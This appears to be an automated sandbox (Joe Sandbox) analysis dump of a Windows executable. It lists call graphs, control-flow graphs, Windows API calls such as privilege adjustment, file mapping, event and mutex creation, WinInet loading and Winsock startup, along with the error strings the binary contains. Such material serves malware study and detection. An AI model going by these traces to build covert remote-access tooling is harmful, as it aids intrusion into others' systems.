InterlockedDecrement SysFreeString std::ios_base::_Tidy 81354->81365 81356 1115bbd7 81366 11097550 InterlockedDecrement SysFreeString std::ios_base::_Tidy 81356->81366 81358->81339 81359->81337 81361 1110f420 std::locale::_Init 265 API calls 81360->81361 81362 110974d3 81361->81362 81363 110974e6 SysAllocString 81362->81363 81364 11097504 81362->81364 81363->81364 81364->81352 81365->81356 81366->81347 81367 6c7963a0 81368 6c7963a5 81367->81368 81369 6c7963a9 WSACancelBlockingCall 81368->81369 81370 6c7963b1 Sleep 81368->81370 81371 110304b8 81372 11142a60 267 API calls 81371->81372 81373 110304c6 81372->81373 81374 11142bb0 86 API calls 81373->81374 81375 11030503 81374->81375 81376 11030518 81375->81376 81377 11081bb0 86 API calls 81375->81377 81378 110ed1a0 8 API calls 81376->81378 81377->81376 81379 1103053f 81378->81379 81380 11030589 81379->81380 81443 110ed250 81 API calls 2 library calls 81379->81443 81383 11142bb0 86 API calls 81380->81383 81382 11030554 81444 110ed250 81 API calls 2 library calls 81382->81444 81385 110305a0 81383->81385 81387 1110f420 std::locale::_Init 265 API calls 81385->81387 81386 1103056b 81386->81380 81388 111463d0 19 API calls 81386->81388 81389 110305af 81387->81389 81388->81380 81390 110305d0 81389->81390 81445 11088860 268 API calls 81389->81445 81422 1108a470 81390->81422 81393 110305e3 OpenMutexA 81394 11030603 CreateMutexA 81393->81394 81395 1103071a CloseHandle 81393->81395 81396 11030623 81394->81396 81397 1108a570 69 API calls 81395->81397 81398 1110f420 std::locale::_Init 265 API calls 81396->81398 81400 11030730 81397->81400 81399 11030638 81398->81399 81401 1103065b 81399->81401 81446 11060be0 293 API calls std::locale::_Init 81399->81446 81403 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 81400->81403 81433 11015c30 LoadLibraryA 81401->81433 81404 110310b3 81403->81404 81406 1103066d 81407 111450a0 std::locale::_Init 90 API calls 81406->81407 81408 1103067c 81407->81408 81409 11030689 81408->81409 81410 1103069c 81408->81410 81434 11145ae0 81409->81434 81412 110306a6 GetProcAddress 81410->81412 81413 11030690 81410->81413 81412->81413 81414 110306c0 SetLastError 81412->81414 81415 110281a0 47 API calls 81413->81415 81414->81413 81416 110306cd 81415->81416 81447 110092f0 427 API calls std::locale::_Init 81416->81447 81418 110306dc 81419 110306f0 WaitForSingleObject 81418->81419 81419->81419 81420 11030702 CloseHandle 81419->81420 81420->81395 81421 11030713 FreeLibrary 81420->81421 81421->81395 81423 1110f420 std::locale::_Init 265 API calls 81422->81423 81424 1108a4a7 81423->81424 81426 1110f420 std::locale::_Init 265 API calls 81424->81426 81429 1108a4c9 InitializeCriticalSection 81424->81429 81427 1108a4c2 81426->81427 81427->81429 81448 1116219a 66 API calls std::exception::_Copy_str 81427->81448 81428 1108a52a 81428->81393 81429->81428 81431 1108a4f9 81449 111625f1 RaiseException 81431->81449 81433->81406 81435 111450a0 std::locale::_Init 90 API calls 81434->81435 81436 11145af2 81435->81436 81437 11145b30 81436->81437 81438 11145af9 LoadLibraryA 81436->81438 81437->81413 81439 11145b2a 81438->81439 81440 11145b0b GetProcAddress 81438->81440 81439->81413 81441 11145b23 FreeLibrary 81440->81441 81442 11145b1b 81440->81442 81441->81439 81442->81441 81443->81382 81444->81386 81445->81390 81446->81401 81447->81418 81448->81431 81449->81429 81450 1116970d 81451 1116971d 81450->81451 81452 11169718 81450->81452 81456 11169617 81451->81456 81468 11177075 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 81452->81468 81455 1116972b 81457 11169623 _fgetc 81456->81457 81458 11169670 81457->81458 81465 111696c0 _fgetc 81457->81465 81469 111694b3 81457->81469 81458->81465 81519 11025e20 81458->81519 81461 11169683 81462 111696a0 81461->81462 81464 11025e20 ___DllMainCRTStartup 7 API calls 81461->81464 81463 111694b3 __CRT_INIT@12 149 API calls 81462->81463 81462->81465 81463->81465 81466 11169697 81464->81466 81465->81455 81467 111694b3 __CRT_INIT@12 149 API calls 81466->81467 81467->81462 81468->81451 81470 111694bf _fgetc 81469->81470 81471 111694c7 81470->81471 81472 11169541 81470->81472 81528 1116d4d0 HeapCreate 81471->81528 81474 111695a2 81472->81474 81480 11169547 81472->81480 81475 111695a7 81474->81475 81476 11169600 81474->81476 81477 1116b5fa ___set_flsgetvalue 3 API calls 81475->81477 81489 111694d0 _fgetc 81476->81489 81622 1116b8fe 79 API calls __freefls@4 81476->81622 81482 111695ac 81477->81482 81478 111694cc 81478->81489 81529 1116b96c GetModuleHandleW 81478->81529 81479 11169565 81485 11169579 81479->81485 81617 1117140e 67 API calls _free 81479->81617 81480->81479 81480->81489 81616 1116d79b 66 API calls _doexit 81480->81616 81487 11169dbe __calloc_crt 66 API calls 81482->81487 81620 1116958c 70 API calls __mtterm 81485->81620 81491 111695b8 81487->81491 81488 111694dc __RTC_Initialize 81492 111694e0 81488->81492 81498 111694ec GetCommandLineA 81488->81498 81489->81458 81491->81489 81494 111695c4 DecodePointer 81491->81494 81613 1116d4ee HeapDestroy 81492->81613 81493 1116956f 81618 1116b64b 70 API calls _free 81493->81618 81499 111695d9 81494->81499 81497 11169574 81619 1116d4ee HeapDestroy 81497->81619 81554 11176f92 GetEnvironmentStringsW 81498->81554 81503 111695f4 81499->81503 81504 111695dd 81499->81504 81507 11162be5 _free 66 API calls 81503->81507 81621 1116b688 66 API calls 4 library calls 81504->81621 81507->81489 81509 111695e4 GetCurrentThreadId 81509->81489 81510 1116950a 81614 1116b64b 70 API calls _free 81510->81614 81514 1116952a 81514->81489 81615 1117140e 67 API calls _free 81514->81615 81520 1110f7d0 81519->81520 81521 1110f7f1 81520->81521 81522 1110f7dc 81520->81522 81524 1110f804 ___DllMainCRTStartup 81520->81524 81639 1110f720 81521->81639 81522->81524 81526 1110f720 ___DllMainCRTStartup 7 API calls 81522->81526 81524->81461 81525 1110f7f8 81525->81461 81527 1110f7e5 81526->81527 81527->81461 81528->81478 81530 1116b980 81529->81530 81531 1116b989 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81529->81531 81623 1116b64b 70 API calls _free 81530->81623 81533 1116b9d3 TlsAlloc 81531->81533 81536 1116bae2 81533->81536 81537 1116ba21 TlsSetValue 81533->81537 81534 1116b985 81534->81488 81536->81488 81537->81536 81538 1116ba32 81537->81538 81624 1116d557 EncodePointer EncodePointer __init_pointers _raise __initp_misc_winsig 81538->81624 81540 1116ba37 EncodePointer EncodePointer EncodePointer EncodePointer 81625 111735c2 InitializeCriticalSectionAndSpinCount 81540->81625 81542 1116ba76 81543 1116badd 81542->81543 81544 1116ba7a DecodePointer 81542->81544 81627 1116b64b 70 API calls _free 81543->81627 81546 1116ba8f 81544->81546 81546->81543 81547 11169dbe __calloc_crt 66 API calls 81546->81547 81548 1116baa5 81547->81548 81548->81543 81549 1116baad DecodePointer 81548->81549 81550 1116babe 81549->81550 81550->81543 81551 1116bac2 81550->81551 81626 1116b688 66 API calls 4 library calls 81551->81626 81553 1116baca GetCurrentThreadId 81553->81536 81555 11176fae WideCharToMultiByte 81554->81555 81556 111694fc 81554->81556 81558 11176fe3 81555->81558 81559 1117701b FreeEnvironmentStringsW 81555->81559 81567 111711c9 GetStartupInfoW 81556->81567 81560 11169d79 __malloc_crt 66 API calls 81558->81560 81559->81556 81561 11176fe9 81560->81561 81561->81559 81562 11176ff1 WideCharToMultiByte 81561->81562 81563 11177003 81562->81563 81564 1117700f FreeEnvironmentStringsW 81562->81564 81565 11162be5 _free 66 API calls 81563->81565 81564->81556 81566 1117700b 81565->81566 81566->81564 81568 11169dbe __calloc_crt 66 API calls 81567->81568 81569 111711e7 81568->81569 81569->81569 81571 11169dbe __calloc_crt 66 API calls 81569->81571 81573 11169506 81569->81573 81575 111712dc 81569->81575 81576 1117135c 81569->81576 81570 11171392 GetStdHandle 81570->81576 81571->81569 81572 111713f6 SetHandleCount 81572->81573 81573->81510 81580 11176ed7 81573->81580 81574 111713a4 GetFileType 81574->81576 81575->81576 81577 11171313 InitializeCriticalSectionAndSpinCount 81575->81577 81578 11171308 GetFileType 81575->81578 81576->81570 81576->81572 81576->81574 81579 111713ca InitializeCriticalSectionAndSpinCount 81576->81579 81577->81573 81577->81575 81578->81575 81578->81577 81579->81573 81579->81576 81581 11176ef1 GetModuleFileNameA 81580->81581 81582 11176eec 81580->81582 81584 11176f18 81581->81584 81634 11170be7 94 API calls __setmbcp 81582->81634 81628 11176d3d 81584->81628 81587 11169516 81587->81514 81591 11176c61 81587->81591 81588 11169d79 __malloc_crt 66 API calls 81589 11176f5a 81588->81589 81589->81587 81590 11176d3d _parse_cmdline 76 API calls 81589->81590 81590->81587 81592 11176c6a 81591->81592 81595 11176c6f _strlen 81591->81595 81636 11170be7 94 API calls __setmbcp 81592->81636 81594 1116951f 81594->81514 81607 1116d5ae 81594->81607 81595->81594 81596 11169dbe __calloc_crt 66 API calls 81595->81596 81600 11176ca4 _strlen 81596->81600 81597 11176cf3 81598 11162be5 _free 66 API calls 81597->81598 81598->81594 81599 11169dbe __calloc_crt 66 API calls 81599->81600 81600->81594 81600->81597 81600->81599 81601 11176d19 81600->81601 81603 1116be9f _strcpy_s 66 API calls 81600->81603 81604 11176d30 81600->81604 81602 11162be5 _free 66 API calls 81601->81602 81602->81594 81603->81600 81605 1116deb2 __invoke_watson 10 API calls 81604->81605 81606 11176d3c 81605->81606 81609 1116d5bc __IsNonwritableInCurrentImage 81607->81609 81637 1116c9cb EncodePointer 81609->81637 81610 1116d5da __initterm_e 81612 1116d5fb __IsNonwritableInCurrentImage 81610->81612 81638 11162f15 76 API calls __cinit 81610->81638 81612->81514 81613->81489 81614->81492 81615->81510 81616->81479 81617->81493 81618->81497 81619->81485 81620->81489 81621->81509 81622->81489 81623->81534 81624->81540 81625->81542 81626->81553 81627->81536 81630 11176d5c 81628->81630 81632 11176dc9 81630->81632 81635 111766ce 76 API calls x_ismbbtype_l 81630->81635 81631 11176ec7 81631->81587 81631->81588 81632->81631 81633 111766ce 76 API calls __splitpath_helper 81632->81633 81633->81632 81634->81581 81635->81630 81636->81595 81637->81610 81638->81612 81640 1110f764 EnterCriticalSection 81639->81640 81641 1110f74f InitializeCriticalSection 81639->81641 81642 1110f785 81640->81642 81641->81640 81643 1110f7b3 LeaveCriticalSection 81642->81643 81644 1110f6c0 ___DllMainCRTStartup 4 API calls 81642->81644 81643->81525 81644->81642 81645 6c7b5ae6 81646 6c7b5af1 ___security_init_cookie 81645->81646 81647 6c7b5af6 81645->81647 81646->81647 81650 6c7b59f0 81647->81650 81649 6c7b5b04 81651 6c7b59fc 81650->81651 81655 6c7b5a99 81651->81655 81656 6c7b5a49 81651->81656 81658 6c7b588c 81651->81658 81653 6c7b5a79 81654 6c7b588c __CRT_INIT@12 45 API calls 81653->81654 81653->81655 81654->81655 81655->81649 81656->81653 81656->81655 81657 6c7b588c __CRT_INIT@12 45 API calls 81656->81657 81657->81653 81659 6c7b5898 81658->81659 81660 6c7b591a 81659->81660 81661 6c7b58a0 81659->81661 81662 6c7b597b 81660->81662 81667 6c7b5920 81660->81667 81696 6c7b607f HeapCreate 81661->81696 81664 6c7b59d9 81662->81664 81665 6c7b5980 81662->81665 81670 6c7b59de __freeptd 81664->81670 81677 6c7b58a9 81664->81677 81697 6c7b6da9 TlsGetValue 81665->81697 81668 6c7b593e 81667->81668 81667->81677 81710 6c7b5e35 7 API calls _doexit 81667->81710 81673 6c7b5943 __ioterm 81668->81673 81668->81677 81669 6c7b58a5 81669->81677 81678 6c7b58c0 __RTC_Initialize GetCommandLineA ___crtGetEnvironmentStringsA __ioinit 81669->81678 81670->81677 81711 6c7b6dfa DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 81673->81711 81677->81656 81679 6c7b58ea 81678->81679 81680 6c7b58e3 81678->81680 81707 6c7bef5b ___initmbctable GetModuleFileNameA __malloc_crt _parse_cmdline 81679->81707 81706 6c7b6dfa DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 81680->81706 81681 6c7b599d DecodePointer 81684 6c7b59b2 81681->81684 81686 6c7b59cd _free 81684->81686 81687 6c7b59b6 81684->81687 81685 6c7b58ef 81688 6c7b5913 __ioterm 81685->81688 81708 6c7becd4 9 API calls __calloc_crt 81685->81708 81686->81677 81712 6c7b6e37 5 API calls __getptd_noexit 81687->81712 81688->81680 81691 6c7b59bd GetCurrentThreadId 81691->81677 81692 6c7b58f8 81692->81688 81709 6c7b5c32 __initterm_e EncodePointer __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 81692->81709 81694 6c7b5903 81694->81688 81695 6c7b5908 81694->81695 81695->81677 81696->81669 81698 6c7b5985 81697->81698 81699 6c7b6dbe DecodePointer TlsSetValue 81697->81699 81700 6c7bd3f5 81698->81700 81699->81698 81702 6c7bd3fe 81700->81702 81701 6c7ba082 _calloc RtlAllocateHeap 81701->81702 81702->81701 81703 6c7b5991 81702->81703 81704 6c7bd41c Sleep 81702->81704 81703->81677 81703->81681 81705 6c7bd431 81704->81705 81705->81702 81705->81703 81706->81677 81707->81685 81708->81692 81709->81694 81710->81668 81711->81677 81712->81691

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 716 1109e190-1109e1f2 call 1109d980 719 1109e1f8-1109e21b call 1109d440 716->719 720 1109e810 716->720 726 1109e221-1109e235 LocalAlloc 719->726 727 1109e384-1109e386 719->727 721 1109e812-1109e82d call 11161d01 720->721 728 1109e23b-1109e26d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 726->728 729 1109e805-1109e80b call 1109d4d0 726->729 730 1109e316-1109e33b CreateFileMappingA 727->730 733 1109e2fa-1109e310 728->733 734 1109e273-1109e29e call 1109d3a0 call 1109d3f0 728->734 729->720 731 1109e388-1109e39b GetLastError 730->731 732 1109e33d-1109e35d GetLastError call 1112ef20 730->732 736 1109e39d 731->736 737 1109e3a2-1109e3b9 MapViewOfFile 731->737 747 1109e368-1109e370 732->747 748 1109e35f-1109e366 LocalFree 732->748 733->730 758 1109e2e9-1109e2f1 734->758 759 1109e2a0-1109e2d6 GetSecurityDescriptorSacl 734->759 736->737 740 1109e3bb-1109e3d6 call 1112ef20 737->740 741 1109e3f7-1109e3ff 737->741 761 1109e3d8-1109e3d9 LocalFree 740->761 762 1109e3db-1109e3e3 740->762 745 1109e4a1-1109e4b3 741->745 746 1109e405-1109e41e GetModuleFileNameA 741->746 752 1109e4f9-1109e512 call 11161d20 GetTickCount 745->752 753 1109e4b5-1109e4b8 745->753 754 1109e4bd-1109e4d8 call 1112ef20 746->754 755 1109e424-1109e42d 746->755 756 1109e372-1109e373 LocalFree 747->756 757 1109e375-1109e37f 747->757 748->747 777 1109e514-1109e519 752->777 763 1109e59f-1109e603 GetCurrentProcessId GetModuleFileNameA call 1109d810 753->763 781 1109e4da-1109e4db LocalFree 754->781 782 1109e4dd-1109e4e5 754->782 755->754 764 1109e433-1109e436 755->764 756->757 766 1109e7fe-1109e800 call 1109d8c0 757->766 758->733 768 1109e2f3-1109e2f4 FreeLibrary 758->768 759->758 767 1109e2d8-1109e2e3 SetSecurityDescriptorSacl 759->767 761->762 770 1109e3e8-1109e3f2 762->770 771 1109e3e5-1109e3e6 LocalFree 762->771 788 1109e60b-1109e622 CreateEventA 763->788 789 1109e605 763->789 773 1109e479-1109e49c call 1112ef20 call 1109d8c0 764->773 774 1109e438-1109e43c 764->774 766->729 767->758 768->733 770->766 771->770 773->745 774->773 780 1109e43e-1109e449 774->780 785 1109e51b-1109e52a 777->785 786 1109e52c 777->786 790 1109e450-1109e454 780->790 781->782 783 1109e4ea-1109e4f4 782->783 784 1109e4e7-1109e4e8 LocalFree 782->784 783->766 784->783 785->777 785->786 795 1109e52e-1109e534 786->795 793 1109e624-1109e643 GetLastError * 2 call 1112ef20 788->793 794 1109e646-1109e64e 788->794 789->788 791 1109e470-1109e472 790->791 792 1109e456-1109e458 790->792 800 1109e475-1109e477 791->800 797 1109e45a-1109e460 792->797 798 1109e46c-1109e46e 792->798 793->794 801 1109e650 794->801 802 1109e656-1109e667 CreateEventA 794->802 803 1109e545-1109e59d 795->803 804 1109e536-1109e543 795->804 797->791 805 1109e462-1109e46a 797->805 798->800 800->754 800->773 801->802 807 1109e669-1109e688 GetLastError * 2 call 1112ef20 802->807 808 1109e68b-1109e693 802->808 803->763 804->795 804->803 805->790 805->798 807->808 810 1109e69b-1109e6ad CreateEventA 808->810 811 1109e695 808->811 813 1109e6af-1109e6ce GetLastError * 2 call 1112ef20 810->813 814 1109e6d1-1109e6d9 810->814 811->810 813->814 815 1109e6db 814->815 816 1109e6e1-1109e6f2 CreateEventA 814->816 815->816 818 1109e714-1109e722 816->818 819 1109e6f4-1109e711 GetLastError * 2 call 1112ef20 816->819 822 1109e724-1109e725 LocalFree 818->822 823 1109e727-1109e72f 818->823 819->818 822->823 825 1109e731-1109e732 LocalFree 823->825 826 1109e734-1109e73d 823->826 825->826 827 1109e743-1109e746 826->827 828 1109e7e7-1109e7f9 call 1112ef20 826->828 827->828 830 1109e74c-1109e74f 827->830 828->766 830->828 832 1109e755-1109e758 830->832 832->828 833 1109e75e-1109e761 832->833 834 1109e76c-1109e788 CreateThread 833->834 835 1109e763-1109e769 GetCurrentThreadId 833->835 836 1109e78a-1109e794 834->836 837 1109e796-1109e7a0 834->837 835->834 836->766 838 1109e7ba-1109e7e5 SetEvent call 1112ef20 call 1109d4d0 837->838 839 1109e7a2-1109e7b8 ResetEvent * 3 837->839 838->721 839->838
                                                                                                              APIs
                                                                                                                • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,E43C2CA5,00080000,00000000,00000000), ref: 1109D46D
                                                                                                                • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                                                • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                                                • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                                              • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,E43C2CA5,00080000,00000000,00000000), ref: 1109E225
                                                                                                              • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
                                                                                                              • GetVersionExA.KERNEL32(?), ref: 1109E260
                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
                                                                                                              • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
                                                                                                              • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
                                                                                                              • GetLastError.KERNEL32 ref: 1109E33D
                                                                                                              • LocalFree.KERNEL32(?), ref: 1109E366
                                                                                                              • LocalFree.KERNEL32(?), ref: 1109E373
                                                                                                              • GetLastError.KERNEL32 ref: 1109E390
                                                                                                              • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
                                                                                                              • LocalFree.KERNEL32(?), ref: 1109E3D9
                                                                                                              • LocalFree.KERNEL32(?), ref: 1109E3E6
                                                                                                                • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
                                                                                                                • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
                                                                                                              • LocalFree.KERNEL32(?), ref: 1109E4DB
                                                                                                              • LocalFree.KERNEL32(?), ref: 1109E4E8
                                                                                                              • _memset.LIBCMT ref: 1109E500
                                                                                                              • GetTickCount.KERNEL32 ref: 1109E508
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 1109E5B4
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
                                                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
                                                                                                              • GetLastError.KERNEL32 ref: 1109E624
                                                                                                              • GetLastError.KERNEL32(00000000), ref: 1109E62B
                                                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
                                                                                                              • GetLastError.KERNEL32 ref: 1109E669
                                                                                                              • GetLastError.KERNEL32(00000000), ref: 1109E670
                                                                                                              • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
                                                                                                              • GetLastError.KERNEL32 ref: 1109E6AF
                                                                                                              • GetLastError.KERNEL32(00000000), ref: 1109E6B6
                                                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
                                                                                                              • GetLastError.KERNEL32 ref: 1109E6FA
                                                                                                              • GetLastError.KERNEL32(00000000), ref: 1109E6FD
                                                                                                              • LocalFree.KERNEL32(?), ref: 1109E725
                                                                                                              • LocalFree.KERNEL32(?), ref: 1109E732
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 1109E763
                                                                                                              • CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
                                                                                                              • ResetEvent.KERNEL32(?), ref: 1109E7AC
                                                                                                              • ResetEvent.KERNEL32(?), ref: 1109E7B2
                                                                                                              • ResetEvent.KERNEL32(?), ref: 1109E7B8
                                                                                                              • SetEvent.KERNEL32(?), ref: 1109E7BE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                              • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                              • API String ID: 3291243470-2792520954
                                                                                                              • Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                                              • Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
                                                                                                              • Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                                              • Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 844 6c7a7030-6c7a7050 call 6c792a90 call 6c7adbd0 849 6c7a7052-6c7a7095 LoadLibraryA 844->849 850 6c7a7097 844->850 851 6c7a7099-6c7a70f8 call 6c798d00 InitializeCriticalSection CreateEventA 849->851 850->851 854 6c7a70fa-6c7a710e call 6c796f50 851->854 855 6c7a7111-6c7a711e CreateEventA 851->855 854->855 857 6c7a7120-6c7a7134 call 6c796f50 855->857 858 6c7a7137-6c7a7144 CreateEventA 855->858 857->858 861 6c7a715d-6c7a7170 WSAStartup 858->861 862 6c7a7146-6c7a715a call 6c796f50 858->862 864 6c7a7172-6c7a7182 call 6c795290 call 6c792b70 861->864 865 6c7a7183-6c7a71b2 call 6c7b1b69 861->865 862->861 873 6c7a71d0-6c7a71e4 call 6c7b1c50 865->873 874 6c7a71b4-6c7a71cd call 6c796f50 865->874 880 6c7a71fa-6c7a7202 873->880 881 6c7a71e6-6c7a71e9 873->881 874->873 883 6c7a7209-6c7a7223 call 6c7b3753 880->883 884 6c7a7204 880->884 881->880 882 6c7a71eb-6c7a71f1 881->882 882->880 885 6c7a71f3-6c7a71f8 882->885 888 6c7a723c-6c7a7255 call 6c7a9bf0 883->888 889 6c7a7225-6c7a7239 call 6c796f50 883->889 884->883 885->883 894 6c7a726a-6c7a7271 call 6c795730 888->894 895 6c7a7257-6c7a725e 888->895 889->888 899 6c7a730b-6c7a7310 894->899 900 6c7a7277-6c7a729a call 6c7b1b69 894->900 896 6c7a7260-6c7a7268 895->896 896->894 896->896 902 6c7a731e-6c7a7336 call 6c795e90 call 6c795530 899->902 903 6c7a7312-6c7a7315 899->903 907 6c7a72be-6c7a72dc call 6c7b1c50 call 6c7b1b69 900->907 908 6c7a729c-6c7a72bb call 6c796f50 900->908 909 6c7a7339-6c7a7354 call 6c795e90 902->909 903->902 904 6c7a7317-6c7a731c 903->904 904->902 904->909 928 6c7a72fa-6c7a7308 call 6c7b1c50 907->928 929 6c7a72de-6c7a72f7 call 6c796f50 907->929 908->907 919 6c7a7361-6c7a738b GetTickCount CreateThread 909->919 920 6c7a7356-6c7a735c 909->920 922 6c7a73a9-6c7a73b6 SetThreadPriority 919->922 923 6c7a738d-6c7a73a6 call 6c796f50 919->923 920->919 926 6c7a73b8-6c7a73cc call 6c796f50 922->926 927 6c7a73cf-6c7a73ed call 6c795f20 call 6c795e90 922->927 923->922 926->927 941 6c7a73ef 927->941 942 6c7a73f5-6c7a73f7 927->942 928->899 929->928 941->942 943 6c7a73f9-6c7a7407 call 6c7adbd0 942->943 944 6c7a7425-6c7a7447 GetModuleFileNameA call 6c792420 942->944 949 6c7a7409-6c7a741c call 6c794580 943->949 950 6c7a741e 943->950 951 6c7a7449-6c7a744a 944->951 952 6c7a744c 944->952 954 6c7a7420 949->954 950->954 955 6c7a7451-6c7a746d 951->955 952->955 954->944 957 6c7a7470-6c7a747f 955->957 957->957 958 6c7a7481-6c7a7486 957->958 959 6c7a7487-6c7a748d 958->959 959->959 960 6c7a748f-6c7a74c8 GetPrivateProfileIntA GetModuleHandleA 959->960 961 6c7a74ce-6c7a74fa call 6c795e90 * 2 960->961 962 6c7a7563-6c7a758f CreateMutexA timeBeginPeriod 960->962 967 6c7a74fc-6c7a7511 call 6c795e90 961->967 968 6c7a7536-6c7a755d call 6c795e90 * 2 961->968 974 6c7a752a-6c7a7530 967->974 975 6c7a7513-6c7a7528 call 6c795e90 967->975 968->962 974->968 975->968 975->974
                                                                                                              APIs
                                                                                                                • Part of subcall function 6C792A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6C792ACB
                                                                                                                • Part of subcall function 6C792A90: _strrchr.LIBCMT ref: 6C792ADA
                                                                                                                • Part of subcall function 6C792A90: _strrchr.LIBCMT ref: 6C792AEA
                                                                                                                • Part of subcall function 6C792A90: wsprintfA.USER32 ref: 6C792B05
                                                                                                                • Part of subcall function 6C7ADBD0: _malloc.LIBCMT ref: 6C7ADBE9
                                                                                                                • Part of subcall function 6C7ADBD0: wsprintfA.USER32 ref: 6C7ADC04
                                                                                                                • Part of subcall function 6C7ADBD0: _memset.LIBCMT ref: 6C7ADC27
                                                                                                              • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6C7A7057
                                                                                                              • InitializeCriticalSection.KERNEL32(6C7DB898), ref: 6C7A70DF
                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C7A70EF
                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C7A7115
                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C7A713B
                                                                                                              • WSAStartup.WSOCK32(00000101,6C7DB91A), ref: 6C7A7167
                                                                                                              • _malloc.LIBCMT ref: 6C7A71A3
                                                                                                                • Part of subcall function 6C7B1B69: __FF_MSGBANNER.LIBCMT ref: 6C7B1B82
